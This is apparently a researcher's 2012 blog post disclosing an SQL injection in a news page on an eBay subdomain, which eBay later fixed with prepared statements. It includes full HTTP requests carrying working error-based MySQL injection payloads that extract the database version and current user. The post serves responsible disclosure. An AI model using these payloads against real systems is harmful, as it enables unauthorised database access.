During my latest bug hunting on subdomains of eBay I found an exploitable SQL injection which I prompt reported to eBays security team. After my initial contact it took 20 days until they finally fixed the SQL injection issue. Ebay sent me a highend computer mouse with cool features as gift for my responsible and coordinated disclosure. The vulnerable page was located at http://sea.ebay.com/news.php and the “checkbox” array POST parameter was prone to sql injection. During the research I found that everytime one put some SQL statements there it will show you a common SQL errormessage which tells that the syntax is wrong. For example when I supplied:

Enforcing an error message - @@secalert
1
2
3
4
...
POST /news.php?time=3&catid=31 HTTP/1.1
...
checkbox%5B%5D=(select @@secalert)

the webserver responsed with the message: “Unknown system variable ‘secalert’ ” which indicates that user-supplied values are used as statements within the legitimate SQL query.

But if I supplied a correct syntax I got no results from the webserver. So I thought on create a subquery using a nested SELECT statement which would then give me some results when the syntax of the main SELECT statement is incorrect. So here we go in the next step:

SQL injection PoC 1 - @@version
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+%40%40VERSION)%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))

This time i got a valid response with following message. I have marked the interesting part showing the version of the used DBMS.

To verify that its really exploitable I decided to make a second request asking for the current DBMS user.

SQL Injection PoC 2 - user()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /news.php?time=3&catid=31 HTTP/1.1
Referer: http://sea.ebay.com/news/abpost/update/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: sea.ebay.com
Cookie: PHPSESSID=r84jrpqcue89t35dgdmd9mggg3; Campaign_country=MY; Campaign=11111; Campaign_kw=23; phpbb3_pcofr_u=1; phpbb3_pcofr_k=; phpbb3_pcofr_sid=e0c86e2f56f810ef4ec3991e95ebe9f8
Content-Length: 243
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+count(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())%2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&

This time the webserver response contained the name uf the current DBMS user as you may see in the following screenshot.

Finally eBay mitigated this issue by using “prepared Statements” to prevent user-supplied values being part of the original SQL query.

timeline
1
2
3
4
5
6
October,  30th 2012: Vulnerability found and reported to eBay (securityresearch@ebay.com)
November, 05th 2012: Vulnerability reported to eBay once again 
November, 05th 2012: Ebay confirms the presence of the SQL injection
November, 16th 2012: Ebay replied that the SQL Injection is now fixed and they want to send me a little gift
November, 18th 2012: I've published this blog post 
December, 15th 2012: I've received an optical computer mouse coming from ebay security team